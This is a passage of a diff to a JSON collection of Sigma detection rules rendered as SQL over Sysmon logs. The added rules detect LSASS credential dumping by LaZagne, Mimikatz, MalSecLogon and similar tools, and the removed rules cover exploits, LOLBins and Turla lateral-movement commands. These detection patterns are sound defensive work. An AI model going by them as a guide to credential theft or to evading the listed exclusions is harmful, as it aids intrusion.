Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE 